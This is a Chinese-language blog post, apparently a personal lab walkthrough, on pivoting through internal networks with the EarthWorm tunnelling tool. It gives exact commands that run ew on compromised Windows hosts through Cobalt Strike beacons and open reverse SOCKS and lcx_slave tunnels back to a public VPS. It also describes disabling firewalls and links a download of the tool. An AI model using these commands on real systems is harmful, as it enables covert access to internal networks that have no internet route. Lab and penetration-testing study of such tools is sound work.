EarthWorm內網穿透（結合前2天學的smb上線不出網機器完成一級與二級流量代理）

題記

       這幾天一直在qq群聽人討論ew，就想着說的人多的工具肯定是好工具，於是打算嘗試用一下這個內網大殺器，一開始找工具就遇到難題，作者好像覺得這個工具被用在滲透上停止分享了，終於在別人博客里找到了下載路徑。https://www.lanzous.com/i78bvvi。總的體驗下來我覺得他比frp還簡單，真是一條好蚯蚓啊，鑽的隧道真不戳。

准備工作

       實驗一：一台外網vps（103.234.72.5），內網兩台用於驗證成功（192.168.1.200是win10，用於搭建ew服務端。192.168.1.132是win8的靶場集合，各個端口對應不同的靶場，驗證全局代理成功。）

       實驗二：一台外網vps（103.234.72.5），（192.168.1.3是win8，為目標代理主機。192.168.1.132是win8的靶場集合，各個端口對應不同的靶場，也是流量中轉機器。）

基礎知識點

       基礎知識很重要，可以結合命令自己在本上寫寫畫畫，很快就清晰了。

       目前工具提供六種鏈路狀態，可通過 -s 參數進行選定，分別為:

              ssocksd、rcsocks、rssocks、lcx_slave、lcx_tran、lcx_listen

       其中 SOCKS5 服務的核心邏輯支持由 ssocksd 和 rssocks 提供，分別對應正向與反向socks代理。

0x01 socks代理

       ssocksd：用來開啟Socks5代理服務

       rssocks：本地啟用Socks5服務，並反彈到另一IP地址

       rcsocks：接收反彈過來的Socks5服務，並轉向另一端口 其余的lcx鏈路狀態用於打通測試主機同socks服務器之間的通路。

0x02 lcx 類別管道

       lcx_slave，lcx_listen：端口轉發

       lcx_tran：端口映射

       lcx_tran：該管道，通過監聽本地端口接收代理請求，並轉交給代理提供主機。

       lcx_slave：該管道一側通過反彈方式連接代理請求方，另一側連接代理提供主機。

       lcx_listen：該管道，通過監聽本地端口接收數據，並將其轉交給目標網絡回連的代理提供主機。

       通過組合lcx類別管道的特性，可以實現多層內網環境下的滲透測試。

0x03 參數

       -l 開放指定端口監聽

       -d 指定轉發或反彈的主機地址

       -e 指定轉發或反彈的主機端口

       -f 指定連接或映射的主機地址

正向socks5服務器

       當目標網絡邊界存在公網IP且可任意開監聽端口

       ./ew_linux_x64 -s ssocksd -l 8888

       可在該目標機器上開啟一個8888的正向連接，然后其他主機可通過設置代理為目標主機ip:8888 ，添加這個代理就可以使用了

 

 

 

 

反向socks5服務器

服務器（外網vps）

       Xftp把ew傳到vps

       ./ew_linux_x64 -s rcsocks -l 1080 -e 5555

       解釋：把1080端口收到的請求轉發給5555端口。

目標主機

       通過CS把ew傳到目標主機上，在指定目錄輸入命令

              shell C:\Users\admin\Downloads\ew\release\ew_win32.exe -s rssocks -d 103.234.72.5 -e 5555

       解釋：在目標主機啟動服務，反彈到公網主機的5555端口。

       掛上代理就成功了，可以訪問內網了。

二級網絡環境（一）（這種是先日外網服務器在進內網，因為這里沒環境，不實操）

       假設我們獲得了右側A主機和B主機的控制權限，A主機配有2塊網卡，一塊10.129.72.168連通外網，一塊192.168.153.140只能連接內網B主機，無法訪問內網其它資源。B主機可以訪問內網資源，但無法訪問外網。

       先上傳ew到B主機，利用ssocksd方式啟動8888端口的SOCKS代理，命令如下

              shell C:\ew\release\ew_win32.exe -s ssocksd -l 8888

       然后在A主機上執行

              ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888

       意思是把1080端口收到的代理請求轉交給B主機（192.168.152.138）的8888端口

       然后my pc就可以通過A的外網代理10.129.72.168:1080訪問B

二級網絡環境（二）（這種是無外網ip，上線后進行內網穿透。這次實際完成這個。）

       假設我們獲得了右側A主機和B主機的控制權限，A主機沒有公網IP，可訪問b，無法訪問內網資源。B主機可以訪問內網資源，但無法訪問外網。

1、先在公網vps添加轉接隧道，把10800端口收到的代理請求轉給8888端口

       ./ew_for_linux64 -s lcx_listen -l 10800 -e 8888

2、在B主機上正向開啟9999端口

       ew_for_Win.exe -s ssocksd -l 9999

3、在主機A上利用lcx_slave，把公網vps的8888端口和主機B的9999端口連接起來

       ew_for_Win.exe -s lcx_slave -d 公網VPS -e 8888 -f 192.168.153.138 -g 9999

4、此時my pc可以通過訪問公網vps的10800端口來使用B主機（192.168.153.138）提供的9999端口訪問到A主機

       理論是上面這個理論，下面我來實操一下，我這次采用我昨天學的smbbeacon控制兩台主機，在搞代理，這意思就是代理兩層了。

實操

       先上線132，在smbbeacon上線.3。

       遇到坑了：這里需要把2個機器的防火牆關了，要不它攔我流量。

       ./ew_linux_x64 -s lcx_listen -l 10800 -e 8888（vps運行這個，10800流量轉到8888端口）

       shell C:\ew\release\ew_win32.exe -s ssocksd -l 9999（.3運行這個，向外開啟9999代理）

       shell C:\release\ew_win32.exe -s lcx_slave -d 103.234.72.5 -e 8888 -f 192.168.1.3 -g 9999（一邊連vps的8888端口，一邊連.3的9999端口）

       代理成功。

參考文章

       http://blog.csdn.net/Z_Z_W_/article/details/104411564?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-15.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-15.control